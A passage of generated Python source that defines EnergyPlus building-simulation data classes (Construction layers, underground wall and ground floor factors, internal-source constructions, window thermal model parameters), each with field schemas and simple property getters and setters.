    """Assign `value` (float, kg/m3) to IDD field `Moisture Content 13`."""
    self["Moisture Content 13"] = value

@property
def thermal_conductivity_13(self):
    """Return IDD field `Thermal Conductivity 13` (float, W/m-K),
    or None if the field is unset."""
    return self["Thermal Conductivity 13"]

@thermal_conductivity_13.setter
def thermal_conductivity_13(self, value=None):
    """Assign `value` (float, W/m-K) to IDD field `Thermal Conductivity 13`."""
    self["Thermal Conductivity 13"] = value
@property
def moisture_content_14(self):
    """Return IDD field `Moisture Content 14` (float, kg/m3),
    or None if the field is unset."""
    return self["Moisture Content 14"]

@moisture_content_14.setter
def moisture_content_14(self, value=None):
    """Assign `value` (float, kg/m3) to IDD field `Moisture Content 14`."""
    self["Moisture Content 14"] = value

@property
def thermal_conductivity_14(self):
    """Return IDD field `Thermal Conductivity 14` (float, W/m-K),
    or None if the field is unset."""
    return self["Thermal Conductivity 14"]

@thermal_conductivity_14.setter
def thermal_conductivity_14(self, value=None):
    """Assign `value` (float, W/m-K) to IDD field `Thermal Conductivity 14`."""
    self["Thermal Conductivity 14"] = value
@property
def moisture_content_15(self):
    """Return IDD field `Moisture Content 15` (float, kg/m3),
    or None if the field is unset."""
    return self["Moisture Content 15"]

@moisture_content_15.setter
def moisture_content_15(self, value=None):
    """Assign `value` (float, kg/m3) to IDD field `Moisture Content 15`."""
    self["Moisture Content 15"] = value

@property
def thermal_conductivity_15(self):
    """Return IDD field `Thermal Conductivity 15` (float, W/m-K),
    or None if the field is unset."""
    return self["Thermal Conductivity 15"]

@thermal_conductivity_15.setter
def thermal_conductivity_15(self, value=None):
    """Assign `value` (float, W/m-K) to IDD field `Thermal Conductivity 15`."""
    self["Thermal Conductivity 15"] = value
@property
def moisture_content_16(self):
    """Return IDD field `Moisture Content 16` (float, kg/m3),
    or None if the field is unset."""
    return self["Moisture Content 16"]

@moisture_content_16.setter
def moisture_content_16(self, value=None):
    """Assign `value` (float, kg/m3) to IDD field `Moisture Content 16`."""
    self["Moisture Content 16"] = value

@property
def thermal_conductivity_16(self):
    """Return IDD field `Thermal Conductivity 16` (float, W/m-K),
    or None if the field is unset."""
    return self["Thermal Conductivity 16"]

@thermal_conductivity_16.setter
def thermal_conductivity_16(self, value=None):
    """Assign `value` (float, W/m-K) to IDD field `Thermal Conductivity 16`."""
    self["Thermal Conductivity 16"] = value
@property
def moisture_content_17(self):
    """Return IDD field `Moisture Content 17` (float, kg/m3),
    or None if the field is unset."""
    return self["Moisture Content 17"]

@moisture_content_17.setter
def moisture_content_17(self, value=None):
    """Assign `value` (float, kg/m3) to IDD field `Moisture Content 17`."""
    self["Moisture Content 17"] = value

@property
def thermal_conductivity_17(self):
    """Return IDD field `Thermal Conductivity 17` (float, W/m-K),
    or None if the field is unset."""
    return self["Thermal Conductivity 17"]

@thermal_conductivity_17.setter
def thermal_conductivity_17(self, value=None):
    """Assign `value` (float, W/m-K) to IDD field `Thermal Conductivity 17`."""
    self["Thermal Conductivity 17"] = value
@property
def moisture_content_18(self):
    """Return IDD field `Moisture Content 18` (float, kg/m3),
    or None if the field is unset."""
    return self["Moisture Content 18"]

@moisture_content_18.setter
def moisture_content_18(self, value=None):
    """Assign `value` (float, kg/m3) to IDD field `Moisture Content 18`."""
    self["Moisture Content 18"] = value

@property
def thermal_conductivity_18(self):
    """Return IDD field `Thermal Conductivity 18` (float, W/m-K),
    or None if the field is unset."""
    return self["Thermal Conductivity 18"]

@thermal_conductivity_18.setter
def thermal_conductivity_18(self, value=None):
    """Assign `value` (float, W/m-K) to IDD field `Thermal Conductivity 18`."""
    self["Thermal Conductivity 18"] = value
@property
def moisture_content_19(self):
    """Return IDD field `Moisture Content 19` (float, kg/m3),
    or None if the field is unset."""
    return self["Moisture Content 19"]

@moisture_content_19.setter
def moisture_content_19(self, value=None):
    """Assign `value` (float, kg/m3) to IDD field `Moisture Content 19`."""
    self["Moisture Content 19"] = value

@property
def thermal_conductivity_19(self):
    """Return IDD field `Thermal Conductivity 19` (float, W/m-K),
    or None if the field is unset."""
    return self["Thermal Conductivity 19"]

@thermal_conductivity_19.setter
def thermal_conductivity_19(self, value=None):
    """Assign `value` (float, W/m-K) to IDD field `Thermal Conductivity 19`."""
    self["Thermal Conductivity 19"] = value
@property
def moisture_content_20(self):
    """Return IDD field `Moisture Content 20` (float, kg/m3),
    or None if the field is unset."""
    return self["Moisture Content 20"]

@moisture_content_20.setter
def moisture_content_20(self, value=None):
    """Assign `value` (float, kg/m3) to IDD field `Moisture Content 20`."""
    self["Moisture Content 20"] = value

@property
def thermal_conductivity_20(self):
    """Return IDD field `Thermal Conductivity 20` (float, W/m-K),
    or None if the field is unset."""
    return self["Thermal Conductivity 20"]

@thermal_conductivity_20.setter
def thermal_conductivity_20(self, value=None):
    """Assign `value` (float, W/m-K) to IDD field `Thermal Conductivity 20`."""
    self["Thermal Conductivity 20"] = value
@property
def moisture_content_21(self):
    """Return IDD field `Moisture Content 21` (float, kg/m3),
    or None if the field is unset."""
    return self["Moisture Content 21"]

@moisture_content_21.setter
def moisture_content_21(self, value=None):
    """Assign `value` (float, kg/m3) to IDD field `Moisture Content 21`."""
    self["Moisture Content 21"] = value

@property
def thermal_conductivity_21(self):
    """Return IDD field `Thermal Conductivity 21` (float, W/m-K),
    or None if the field is unset."""
    return self["Thermal Conductivity 21"]

@thermal_conductivity_21.setter
def thermal_conductivity_21(self, value=None):
    """Assign `value` (float, W/m-K) to IDD field `Thermal Conductivity 21`."""
    self["Thermal Conductivity 21"] = value
@property
def moisture_content_22(self):
    """Return IDD field `Moisture Content 22` (float, kg/m3),
    or None if the field is unset."""
    return self["Moisture Content 22"]

@moisture_content_22.setter
def moisture_content_22(self, value=None):
    """Assign `value` (float, kg/m3) to IDD field `Moisture Content 22`."""
    self["Moisture Content 22"] = value

@property
def thermal_conductivity_22(self):
    """Return IDD field `Thermal Conductivity 22` (float, W/m-K),
    or None if the field is unset."""
    return self["Thermal Conductivity 22"]

@thermal_conductivity_22.setter
def thermal_conductivity_22(self, value=None):
    """Assign `value` (float, W/m-K) to IDD field `Thermal Conductivity 22`."""
    self["Thermal Conductivity 22"] = value
@property
def moisture_content_23(self):
    """Return IDD field `Moisture Content 23` (float, kg/m3),
    or None if the field is unset."""
    return self["Moisture Content 23"]

@moisture_content_23.setter
def moisture_content_23(self, value=None):
    """Assign `value` (float, kg/m3) to IDD field `Moisture Content 23`."""
    self["Moisture Content 23"] = value

@property
def thermal_conductivity_23(self):
    """Return IDD field `Thermal Conductivity 23` (float, W/m-K),
    or None if the field is unset."""
    return self["Thermal Conductivity 23"]

@thermal_conductivity_23.setter
def thermal_conductivity_23(self, value=None):
    """Assign `value` (float, W/m-K) to IDD field `Thermal Conductivity 23`."""
    self["Thermal Conductivity 23"] = value
@property
def moisture_content_24(self):
    """Return IDD field `Moisture Content 24` (float, kg/m3),
    or None if the field is unset."""
    return self["Moisture Content 24"]

@moisture_content_24.setter
def moisture_content_24(self, value=None):
    """Assign `value` (float, kg/m3) to IDD field `Moisture Content 24`."""
    self["Moisture Content 24"] = value

@property
def thermal_conductivity_24(self):
    """Return IDD field `Thermal Conductivity 24` (float, W/m-K),
    or None if the field is unset."""
    return self["Thermal Conductivity 24"]

@thermal_conductivity_24.setter
def thermal_conductivity_24(self, value=None):
    """Assign `value` (float, W/m-K) to IDD field `Thermal Conductivity 24`."""
    self["Thermal Conductivity 24"] = value
@property
def moisture_content_25(self):
    """Return IDD field `Moisture Content 25` (float, kg/m3),
    or None if the field is unset."""
    return self["Moisture Content 25"]

@moisture_content_25.setter
def moisture_content_25(self, value=None):
    """Assign `value` (float, kg/m3) to IDD field `Moisture Content 25`."""
    self["Moisture Content 25"] = value

@property
def thermal_conductivity_25(self):
    """Return IDD field `Thermal Conductivity 25` (float, W/m-K),
    or None if the field is unset."""
    return self["Thermal Conductivity 25"]

@thermal_conductivity_25.setter
def thermal_conductivity_25(self, value=None):
    """Assign `value` (float, W/m-K) to IDD field `Thermal Conductivity 25`."""
    self["Thermal Conductivity 25"] = value
class Construction(DataObject):
    """Corresponds to IDD object `Construction`.

    Start with the outside layer and work toward the inside layer; up to
    10 layers total (8 for windows).  Each field names the material used
    for that layer.
    """

    # IDD-derived schema driving DataObject's field validation/storage.
    _schema = {'extensible-fields': OrderedDict(),
               'fields': OrderedDict([(u'name',
                                       {'name': u'Name',
                                        'pyname': u'name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'alpha'}),
                                      (u'outside layer',
                                       {'name': u'Outside Layer',
                                        'pyname': u'outside_layer',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'}),
                                      (u'layer 2',
                                       {'name': u'Layer 2',
                                        'pyname': u'layer_2',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'}),
                                      (u'layer 3',
                                       {'name': u'Layer 3',
                                        'pyname': u'layer_3',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'}),
                                      (u'layer 4',
                                       {'name': u'Layer 4',
                                        'pyname': u'layer_4',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'}),
                                      (u'layer 5',
                                       {'name': u'Layer 5',
                                        'pyname': u'layer_5',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'}),
                                      (u'layer 6',
                                       {'name': u'Layer 6',
                                        'pyname': u'layer_6',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'}),
                                      (u'layer 7',
                                       {'name': u'Layer 7',
                                        'pyname': u'layer_7',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'}),
                                      (u'layer 8',
                                       {'name': u'Layer 8',
                                        'pyname': u'layer_8',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'}),
                                      (u'layer 9',
                                       {'name': u'Layer 9',
                                        'pyname': u'layer_9',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'}),
                                      (u'layer 10',
                                       {'name': u'Layer 10',
                                        'pyname': u'layer_10',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'})]),
               'format': None,
               'group': u'Surface Construction Elements',
               'min-fields': 0,
               'name': u'Construction',
               'pyname': u'Construction',
               'required-object': False,
               'unique-object': False}

    @property
    def name(self):
        """Return IDD field `Name` (str), or None if not set."""
        return self["Name"]

    @name.setter
    def name(self, value=None):
        """Assign `value` (str) to IDD field `Name`."""
        self["Name"] = value

    @property
    def outside_layer(self):
        """Return IDD field `Outside Layer` (str), or None if not set."""
        return self["Outside Layer"]

    @outside_layer.setter
    def outside_layer(self, value=None):
        """Assign `value` (str, material name) to IDD field `Outside Layer`."""
        self["Outside Layer"] = value

    @property
    def layer_2(self):
        """Return IDD field `Layer 2` (str), or None if not set."""
        return self["Layer 2"]

    @layer_2.setter
    def layer_2(self, value=None):
        """Assign `value` (str, material name) to IDD field `Layer 2`."""
        self["Layer 2"] = value

    @property
    def layer_3(self):
        """Return IDD field `Layer 3` (str), or None if not set."""
        return self["Layer 3"]

    @layer_3.setter
    def layer_3(self, value=None):
        """Assign `value` (str, material name) to IDD field `Layer 3`."""
        self["Layer 3"] = value

    @property
    def layer_4(self):
        """Return IDD field `Layer 4` (str), or None if not set."""
        return self["Layer 4"]

    @layer_4.setter
    def layer_4(self, value=None):
        """Assign `value` (str, material name) to IDD field `Layer 4`."""
        self["Layer 4"] = value

    @property
    def layer_5(self):
        """Return IDD field `Layer 5` (str), or None if not set."""
        return self["Layer 5"]

    @layer_5.setter
    def layer_5(self, value=None):
        """Assign `value` (str, material name) to IDD field `Layer 5`."""
        self["Layer 5"] = value

    @property
    def layer_6(self):
        """Return IDD field `Layer 6` (str), or None if not set."""
        return self["Layer 6"]

    @layer_6.setter
    def layer_6(self, value=None):
        """Assign `value` (str, material name) to IDD field `Layer 6`."""
        self["Layer 6"] = value

    @property
    def layer_7(self):
        """Return IDD field `Layer 7` (str), or None if not set."""
        return self["Layer 7"]

    @layer_7.setter
    def layer_7(self, value=None):
        """Assign `value` (str, material name) to IDD field `Layer 7`."""
        self["Layer 7"] = value

    @property
    def layer_8(self):
        """Return IDD field `Layer 8` (str), or None if not set."""
        return self["Layer 8"]

    @layer_8.setter
    def layer_8(self, value=None):
        """Assign `value` (str, material name) to IDD field `Layer 8`."""
        self["Layer 8"] = value

    @property
    def layer_9(self):
        """Return IDD field `Layer 9` (str), or None if not set."""
        return self["Layer 9"]

    @layer_9.setter
    def layer_9(self, value=None):
        """Assign `value` (str, material name) to IDD field `Layer 9`."""
        self["Layer 9"] = value

    @property
    def layer_10(self):
        """Return IDD field `Layer 10` (str), or None if not set."""
        return self["Layer 10"]

    @layer_10.setter
    def layer_10(self, value=None):
        """Assign `value` (str, material name) to IDD field `Layer 10`."""
        self["Layer 10"] = value
class ConstructionCfactorUndergroundWall(DataObject):
    """Corresponds to IDD object `Construction:CfactorUndergroundWall`.

    Alternate method of describing underground wall constructions.
    """

    # IDD-derived schema driving DataObject's field validation/storage.
    _schema = {'extensible-fields': OrderedDict(),
               'fields': OrderedDict([(u'name',
                                       {'name': u'Name',
                                        'pyname': u'name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'alpha'}),
                                      (u'c-factor',
                                       {'name': u'C-Factor',
                                        'pyname': u'cfactor',
                                        'minimum>': 0.0,
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'W/m2-K'}),
                                      (u'height',
                                       {'name': u'Height',
                                        'pyname': u'height',
                                        'minimum>': 0.0,
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'm'})]),
               'format': None,
               'group': u'Surface Construction Elements',
               'min-fields': 0,
               'name': u'Construction:CfactorUndergroundWall',
               'pyname': u'ConstructionCfactorUndergroundWall',
               'required-object': False,
               'unique-object': False}

    @property
    def name(self):
        """Return IDD field `Name` (str), or None if not set."""
        return self["Name"]

    @name.setter
    def name(self, value=None):
        """Assign `value` (str) to IDD field `Name`."""
        self["Name"] = value

    @property
    def cfactor(self):
        """Return IDD field `C-Factor` (float, W/m2-K), or None if not set.

        C-Factor is entered without film coefficients or soil.
        """
        return self["C-Factor"]

    @cfactor.setter
    def cfactor(self, value=None):
        """Assign `value` (float, W/m2-K) to IDD field `C-Factor`."""
        self["C-Factor"] = value

    @property
    def height(self):
        """Return IDD field `Height` (float, m: height of the underground
        wall), or None if not set."""
        return self["Height"]

    @height.setter
    def height(self, value=None):
        """Assign `value` (float, m) to IDD field `Height`."""
        self["Height"] = value
class ConstructionFfactorGroundFloor(DataObject):
    """Corresponds to IDD object `Construction:FfactorGroundFloor`.

    Alternate method of describing slab-on-grade or underground floor
    constructions.
    """

    # IDD-derived schema driving DataObject's field validation/storage.
    _schema = {'extensible-fields': OrderedDict(),
               'fields': OrderedDict([(u'name',
                                       {'name': u'Name',
                                        'pyname': u'name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'alpha'}),
                                      (u'f-factor',
                                       {'name': u'F-Factor',
                                        'pyname': u'ffactor',
                                        'minimum>': 0.0,
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'W/m-K'}),
                                      (u'area',
                                       {'name': u'Area',
                                        'pyname': u'area',
                                        'minimum>': 0.0,
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'm2'}),
                                      (u'perimeterexposed',
                                       {'name': u'PerimeterExposed',
                                        'pyname': u'perimeterexposed',
                                        'required-field': True,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'm'})]),
               'format': None,
               'group': u'Surface Construction Elements',
               'min-fields': 0,
               'name': u'Construction:FfactorGroundFloor',
               'pyname': u'ConstructionFfactorGroundFloor',
               'required-object': False,
               'unique-object': False}

    @property
    def name(self):
        """Return IDD field `Name` (str), or None if not set."""
        return self["Name"]

    @name.setter
    def name(self, value=None):
        """Assign `value` (str) to IDD field `Name`."""
        self["Name"] = value

    @property
    def ffactor(self):
        """Return IDD field `F-Factor` (float, W/m-K; IP units Btu/h-ft-F),
        or None if not set."""
        return self["F-Factor"]

    @ffactor.setter
    def ffactor(self, value=None):
        """Assign `value` (float, W/m-K) to IDD field `F-Factor`."""
        self["F-Factor"] = value

    @property
    def area(self):
        """Return IDD field `Area` (float, m2: area of the floor),
        or None if not set."""
        return self["Area"]

    @area.setter
    def area(self, value=None):
        """Assign `value` (float, m2) to IDD field `Area`."""
        self["Area"] = value

    @property
    def perimeterexposed(self):
        """Return IDD field `PerimeterExposed` (float, m: exposed perimeter
        of the floor), or None if not set."""
        return self["PerimeterExposed"]

    @perimeterexposed.setter
    def perimeterexposed(self, value=None):
        """Assign `value` (float, m) to IDD field `PerimeterExposed`."""
        self["PerimeterExposed"] = value
class ConstructionInternalSource(DataObject):

    """ Corresponds to IDD object `Construction:InternalSource`
        Start with outside layer and work your way to the inside Layer
        Up to 10 layers total, 8 for windows
        Enter the material name for each layer
    """

    # Per-field IDD metadata (types, units, limits) for this object.
    # NOTE(review): presumably consumed by the DataObject base class for
    # validation and field access -- confirm against DataObject's implementation.
    # Generated from the EnergyPlus IDD; do not hand-edit.
    _schema = {'extensible-fields': OrderedDict(),
               'fields': OrderedDict([(u'name',
                                       {'name': u'Name',
                                        'pyname': u'name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'alpha'}),
                                      (u'source present after layer number',
                                       {'name': u'Source Present After Layer Number',
                                        'pyname': u'source_present_after_layer_number',
                                        'required-field': True,
                                        'autosizable': False,
                                        'minimum': 1,
                                        'autocalculatable': False,
                                        'type': u'integer'}),
                                      (u'temperature calculation requested after layer number',
                                       {'name': u'Temperature Calculation Requested After Layer Number',
                                        'pyname': u'temperature_calculation_requested_after_layer_number',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'integer'}),
                                      (u'dimensions for the ctf calculation',
                                       {'name': u'Dimensions for the CTF Calculation',
                                        'pyname': u'dimensions_for_the_ctf_calculation',
                                        'maximum': 2,
                                        'required-field': True,
                                        'autosizable': False,
                                        'minimum': 1,
                                        'autocalculatable': False,
                                        'type': u'integer'}),
                                      (u'tube spacing',
                                       {'name': u'Tube Spacing',
                                        'pyname': u'tube_spacing',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'm'}),
                                      (u'outside layer',
                                       {'name': u'Outside Layer',
                                        'pyname': u'outside_layer',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'}),
                                      (u'layer 2',
                                       {'name': u'Layer 2',
                                        'pyname': u'layer_2',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'}),
                                      (u'layer 3',
                                       {'name': u'Layer 3',
                                        'pyname': u'layer_3',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'}),
                                      (u'layer 4',
                                       {'name': u'Layer 4',
                                        'pyname': u'layer_4',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'}),
                                      (u'layer 5',
                                       {'name': u'Layer 5',
                                        'pyname': u'layer_5',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'}),
                                      (u'layer 6',
                                       {'name': u'Layer 6',
                                        'pyname': u'layer_6',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'}),
                                      (u'layer 7',
                                       {'name': u'Layer 7',
                                        'pyname': u'layer_7',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'}),
                                      (u'layer 8',
                                       {'name': u'Layer 8',
                                        'pyname': u'layer_8',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'}),
                                      (u'layer 9',
                                       {'name': u'Layer 9',
                                        'pyname': u'layer_9',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'}),
                                      (u'layer 10',
                                       {'name': u'Layer 10',
                                        'pyname': u'layer_10',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'})]),
               'format': None,
               'group': u'Surface Construction Elements',
               'min-fields': 0,
               'name': u'Construction:InternalSource',
               'pyname': u'ConstructionInternalSource',
               'required-object': False,
               'unique-object': False}

    # Generated field accessors: each getter's docstring also documents the
    # Args/Raises of the paired setter (pyidf convention).

    @property
    def name(self):
        """field `Name`
        Args:
            value (str): value for IDD Field `Name`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `name` or None if not set
        """
        return self["Name"]

    @name.setter
    def name(self, value=None):
        """Corresponds to IDD field `Name`"""
        self["Name"] = value

    @property
    def source_present_after_layer_number(self):
        """field `Source Present After Layer Number`
        | refers to the list of materials which follows
        | value >= 1
        Args:
            value (int): value for IDD Field `Source Present After Layer Number`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            int: the value of `source_present_after_layer_number` or None if not set
        """
        return self["Source Present After Layer Number"]

    @source_present_after_layer_number.setter
    def source_present_after_layer_number(self, value=None):
        """Corresponds to IDD field `Source Present After Layer Number`"""
        self["Source Present After Layer Number"] = value

    @property
    def temperature_calculation_requested_after_layer_number(self):
        """field `Temperature Calculation Requested After Layer Number`
        | refers to the list of materials which follows
        Args:
            value (int): value for IDD Field `Temperature Calculation Requested After Layer Number`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            int: the value of `temperature_calculation_requested_after_layer_number` or None if not set
        """
        return self["Temperature Calculation Requested After Layer Number"]

    @temperature_calculation_requested_after_layer_number.setter
    def temperature_calculation_requested_after_layer_number(self, value=None):
        """Corresponds to IDD field `Temperature Calculation Requested After
        Layer Number`"""
        self["Temperature Calculation Requested After Layer Number"] = value

    @property
    def dimensions_for_the_ctf_calculation(self):
        """field `Dimensions for the CTF Calculation`
        | 1 = 1-dimensional calculation, 2 = 2-dimensional calculation
        | value >= 1
        | value <= 2
        Args:
            value (int): value for IDD Field `Dimensions for the CTF Calculation`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            int: the value of `dimensions_for_the_ctf_calculation` or None if not set
        """
        return self["Dimensions for the CTF Calculation"]

    @dimensions_for_the_ctf_calculation.setter
    def dimensions_for_the_ctf_calculation(self, value=None):
        """Corresponds to IDD field `Dimensions for the CTF Calculation`"""
        self["Dimensions for the CTF Calculation"] = value

    @property
    def tube_spacing(self):
        """field `Tube Spacing`
        | uniform spacing between tubes or resistance wires in direction
        | perpendicular to main intended direction of heat transfer
        | Units: m
        Args:
            value (float): value for IDD Field `Tube Spacing`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            float: the value of `tube_spacing` or None if not set
        """
        return self["Tube Spacing"]

    @tube_spacing.setter
    def tube_spacing(self, value=None):
        """Corresponds to IDD field `Tube Spacing`"""
        self["Tube Spacing"] = value

    @property
    def outside_layer(self):
        """field `Outside Layer`
        Args:
            value (str): value for IDD Field `Outside Layer`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `outside_layer` or None if not set
        """
        return self["Outside Layer"]

    @outside_layer.setter
    def outside_layer(self, value=None):
        """Corresponds to IDD field `Outside Layer`"""
        self["Outside Layer"] = value

    @property
    def layer_2(self):
        """field `Layer 2`
        Args:
            value (str): value for IDD Field `Layer 2`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `layer_2` or None if not set
        """
        return self["Layer 2"]

    @layer_2.setter
    def layer_2(self, value=None):
        """Corresponds to IDD field `Layer 2`"""
        self["Layer 2"] = value

    @property
    def layer_3(self):
        """field `Layer 3`
        Args:
            value (str): value for IDD Field `Layer 3`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `layer_3` or None if not set
        """
        return self["Layer 3"]

    @layer_3.setter
    def layer_3(self, value=None):
        """Corresponds to IDD field `Layer 3`"""
        self["Layer 3"] = value

    @property
    def layer_4(self):
        """field `Layer 4`
        Args:
            value (str): value for IDD Field `Layer 4`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `layer_4` or None if not set
        """
        return self["Layer 4"]

    @layer_4.setter
    def layer_4(self, value=None):
        """Corresponds to IDD field `Layer 4`"""
        self["Layer 4"] = value

    @property
    def layer_5(self):
        """field `Layer 5`
        Args:
            value (str): value for IDD Field `Layer 5`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `layer_5` or None if not set
        """
        return self["Layer 5"]

    @layer_5.setter
    def layer_5(self, value=None):
        """Corresponds to IDD field `Layer 5`"""
        self["Layer 5"] = value

    @property
    def layer_6(self):
        """field `Layer 6`
        Args:
            value (str): value for IDD Field `Layer 6`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `layer_6` or None if not set
        """
        return self["Layer 6"]

    @layer_6.setter
    def layer_6(self, value=None):
        """Corresponds to IDD field `Layer 6`"""
        self["Layer 6"] = value

    @property
    def layer_7(self):
        """field `Layer 7`
        Args:
            value (str): value for IDD Field `Layer 7`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `layer_7` or None if not set
        """
        return self["Layer 7"]

    @layer_7.setter
    def layer_7(self, value=None):
        """Corresponds to IDD field `Layer 7`"""
        self["Layer 7"] = value

    @property
    def layer_8(self):
        """field `Layer 8`
        Args:
            value (str): value for IDD Field `Layer 8`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `layer_8` or None if not set
        """
        return self["Layer 8"]

    @layer_8.setter
    def layer_8(self, value=None):
        """Corresponds to IDD field `Layer 8`"""
        self["Layer 8"] = value

    @property
    def layer_9(self):
        """field `Layer 9`
        Args:
            value (str): value for IDD Field `Layer 9`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `layer_9` or None if not set
        """
        return self["Layer 9"]

    @layer_9.setter
    def layer_9(self, value=None):
        """Corresponds to IDD field `Layer 9`"""
        self["Layer 9"] = value

    @property
    def layer_10(self):
        """field `Layer 10`
        Args:
            value (str): value for IDD Field `Layer 10`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `layer_10` or None if not set
        """
        return self["Layer 10"]

    @layer_10.setter
    def layer_10(self, value=None):
        """Corresponds to IDD field `Layer 10`"""
        self["Layer 10"] = value
class WindowThermalModelParams(DataObject):

    """ Corresponds to IDD object `WindowThermalModel:Params`
        object is used to select which thermal model should be used in tarcog simulations
    """

    # Per-field IDD metadata (types, units, limits, defaults, accepted values).
    # NOTE(review): presumably consumed by the DataObject base class for
    # validation and field access -- confirm against DataObject's implementation.
    # Generated from the EnergyPlus IDD; do not hand-edit.
    _schema = {'extensible-fields': OrderedDict(),
               'fields': OrderedDict([(u'name',
                                       {'name': u'Name',
                                        'pyname': u'name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'alpha'}),
                                      (u'standard',
                                       {'name': u'standard',
                                        'pyname': u'standard',
                                        'default': u'ISO15099',
                                        'required-field': False,
                                        'autosizable': False,
                                        'accepted-values': [u'ISO15099',
                                                            u'EN673Declared',
                                                            u'EN673Design'],
                                        'autocalculatable': False,
                                        'type': 'alpha'}),
                                      (u'thermal model',
                                       {'name': u'Thermal Model',
                                        'pyname': u'thermal_model',
                                        'default': u'ISO15099',
                                        'required-field': False,
                                        'autosizable': False,
                                        'accepted-values': [u'ISO15099',
                                                            u'ScaledCavityWidth',
                                                            u'ConvectiveScalarModel_NoSDThickness',
                                                            u'ConvectiveScalarModel_withSDThickness'],
                                        'autocalculatable': False,
                                        'type': 'alpha'}),
                                      (u'sdscalar',
                                       {'name': u'SDScalar',
                                        'pyname': u'sdscalar',
                                        'default': 1.0,
                                        'maximum': 1.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real'}),
                                      (u'deflection model',
                                       {'name': u'Deflection Model',
                                        'pyname': u'deflection_model',
                                        'default': u'NoDeflection',
                                        'required-field': False,
                                        'autosizable': False,
                                        'accepted-values': [u'NoDeflection',
                                                            u'TemperatureAndPressureInput',
                                                            u'MeasuredDeflection'],
                                        'autocalculatable': False,
                                        'type': 'alpha'}),
                                      (u'vacuum pressure limit',
                                       {'name': u'Vacuum Pressure Limit',
                                        'pyname': u'vacuum_pressure_limit',
                                        'default': 13.238,
                                        'minimum>': 0.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'Pa'}),
                                      (u'initial temperature',
                                       {'name': u'Initial temperature',
                                        'pyname': u'initial_temperature',
                                        'default': 25.0,
                                        'minimum>': 0.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'C'}),
                                      (u'initial pressure',
                                       {'name': u'Initial pressure',
                                        'pyname': u'initial_pressure',
                                        'default': 101325.0,
                                        'minimum>': 0.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'Pa'})]),
               'format': None,
